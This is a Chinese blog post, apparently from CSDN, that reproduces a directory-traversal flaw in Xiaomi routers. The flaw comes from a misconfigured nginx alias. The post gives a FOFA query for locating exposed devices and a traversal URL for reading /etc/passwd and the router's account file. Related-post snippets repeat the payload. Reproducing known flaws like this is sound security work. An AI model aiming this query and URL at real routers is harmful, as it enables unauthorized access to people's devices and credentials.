小米路由器的未授权访问

最新推荐文章于 2024-06-04 22:49:02 发布
最新推荐文章于 2024-06-04 22:49:02 发布
阅读量341 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 智能路由器 网络安全 web安全 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131436030
版权

01 漏洞产生

小米路由器由于Nginx的配置文件,没有配置好,存在一个目录穿越的漏洞。

在Nginx当中存在该漏洞,配置如下:

location /xxx {
    alias /abc/;
}

02 fofa搜索

app=“小米路由器”

03 漏洞利用

如此配置,攻击者可通过

Url:http://ip/xxx…/etc/passwd

来读取到/etc/passwd 文件

而在小米路由器当中的Nginx配置危机为:

location /api-third-party/download/extdisks {
    alias /extdisks/;
}

那可以通过

Url:http://ip/api-third-party/download/extdisks…/etc/passwd

来读取到/etc/passwd文件
在这里插入图片描述
读取构造包/etc/config/account 构造登录包
在这里插入图片描述
后面的构造登录比较难,我也没复现成功

丢了少年失了心1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
小米路由器远程任意文件读取漏洞(CVE-2019-18371)
holen_的博客
01-26 3213
小米路由器nginx配置文件错误,导致目录穿越漏洞,实现任意文件读取(无需登录) nginx配置不当可导致目录穿越漏洞 location /xxx { alias /abc/; } 可通过访问http://domain.cn/xxx…/etc/passwd实现目录穿越访问上级目录及其子目录文件。 在小米路由器的文件/etc/sysapihttpd/sysapihttpd.conf中,存在 location /api-third-party/download/extdisks { alias
小米路由器3的nginx的位置以及nginx的配置文件的位置
php菜鸟博客
08-04 435
nginx 改名为 sysapihttpd, 放在 /usr/sbin/sysapihttpd,然后把 配置文件改为 /etc/sysapihttpd/sysapihttpd.conf
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5763
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
授权访问漏洞汇总
weixin_46137328的博客
09-23 7406
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 988
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
Apache APISIX Dashboard 授权访问(CVE-2021-45232 )
m0_54125423的博客
03-01 5017
一、漏洞原理 Apache APISIX是一个实时、动态、高性能的API网关。Apache APISIX Dashboard旨在让用户尽可能容易地通过前端界面来操作Apache APISIX。 2021年12月27日,Apache官方发布安全通告,Apache APISIX Dashboard中存在一个授权访问漏洞(CVE-2021-45232)。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,在框架 "gin "的基础上引入了框架 "d
小米路由器授权访问漏洞
weixin_43954843的博客
05-25 10
漏洞信息参考乌云上的报告详情 本地测试如下: 连接小米的wifi 登录管理后台页面 有一个密码框 wireshark抓包发现默认传送的用户名为admin 保存wireshark抓到的包 筛选出http报文 发现以下: 小米智能路由器token参数判断当前用户身份的时效性 但token参数过期时间过长 导致只要能获取该参数就可以登录到后台管理系统 将该连接发给同事测试,顺利登录。 ...
璇铠安全实验室| 小米路由器授权访问
pone2233的博客
04-03 1518
漏洞产生 小米路由器由于Nginx的配置文件,没有配置好,存在一个目录穿越的漏洞。 在Nginx当中存在该漏洞,配置如下: location /xxx { alias /abc/; } 漏洞利用 如此配置那攻击者可通过Url:http://ip/xxx../etc/passwd 来读取到/etc/passwd 文件。 而在小米路由器当中的Nginx配置危机为: location /api-third-party/download/extdisks { alias /extd
电脑无法访问小米路由器的解决办法
10-01
发现自己的小米路由器不能连接电脑上网,连接以后电脑还是没有网路,该怎么吧呢?下面我们就来看看这个问题的解决办法,需要的朋友可以参考下
小米路由器怎么限速?小米路由器给设备限速的教程
10-01
小米路由器怎么限速?小米路由器连接的设备很多,想将蹭网的哪些设备网速给设置一下,该怎么办呢?下面我们就来看看小米路由器给设备限速的教程,需要的朋友可以参考下
小米路由器R1D玩机刷机tomato
04-28
小米路由器R1D刷写tomato固件教程 准备工作。 1、小米路由器R1D,把标准版的系统升级成开发版,这步很简单,到官网下载,在升级页面更新就可以了; http://www1.miwifi.com/miwifi_download.html 2、放弃质保(反正...
小米路由器设置安装图文教程
10-01
主要介绍了小米路由器设置安装图文教程的相关资料,小米智能路由器设置,这款路由器带中继功能,信号更强,要比传统路由更强大,需要的朋友可以参考下
电脑怎么访问小米路由器3外置存储?
10-02
电脑怎么访问小米路由器3外置存储?小米路由器3可以外接usb存储设备,该怎么使用电脑访问这个存储设备呢?下面我们就来看看详细的教程,需要的朋友可以参考下
实验9 静态路由配置
w1911026171的博客
06-03 720
实验目的 1.掌握配置静态路由的方法。 2.掌握测试静态路由连通性的方法。 3.掌握配置默认路由的方法。 4.掌握测试默认路由连通性的方法。
VRRP简介
最新发布
学徒心
06-04 439
本文详细阐述了 VRRP(虚拟路由器冗余协议),包括其定义概念,指出它是将多个物理路由器组合成虚拟路由器以提供网关冗余备份;工作原理涉及 VRRP 组的构成及主、备份路由器的职责和切换机制;选取机制包含优先级比较、通告机制和故障判定规则。还介绍了其在企业网络、数据中心、园区网络、服务器集群网络和多分支机构网络等多种场景的应用。对比了 VRRP 与 LACP 在功能和应用场景上的不同,以及 VRRP 与 HSRP 的特点差异。最后探讨了 VRRP 的来趋势,如技术融合、支持更多场景、提高性能可靠性和简化配置
HCIP-Datacom-ARST自选题库__多种协议填空【3道题】
2301_80961833的博客
06-04 90
1.如图所示的BGP/MPLSIP VPN组网,CE1通过EBGP将192.168.1.0/24的路由通告给PE1和PE2,AS200内的路由器通过LoopbackO接口(IP地址已在图中表格标出)建立VPNV4邻居关系,其中PE1/PE2/PE3是P1的客户端,所有路由器运行0SPF协议,VPN实例的RD均为1:1,其他参数均为默认值,则PE3到达192.168.1.0/24的下一跳地址为()。(填写IP地址)10.0.1.12.如图所示的网络,R2与R1之间部署OSPF协议,且R2的GE0/0/1接口也
openstack 中如何检查VLAN 配置: 确保正确配置了两个 VLAN,并且两个 VLAN 之间进行了正确的路由。
weixin_45631123的博客
05-30 390
【代码】openstack 中如何检查VLAN 配置: 确保正确配置了两个 VLAN,并且两个 VLAN 之间进行了正确的路由。
计算机网络期末复习-计算机网络体系结构第一章(王道25)
m0_61636632的博客
05-27 1177
分散的、自治的(一台坏了不影响其他)通信设备与线路软件资源共享和信息传递结点(计算机、集线器、交换机、路由器等)链路节点网络互连网。覆盖全球范围的互连网(最大)世界范围的。
chrome 小米路由器
05-08
小米路由器小米公司出品的一款家用Wifi路由器,主要特点是高速稳定、易操作、智能化管理等。小米路由器具有以下特点: 1.高速稳定:小米路由器采用全球领先的智能分流技术,能够平衡多台设备的数据转发,保证了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值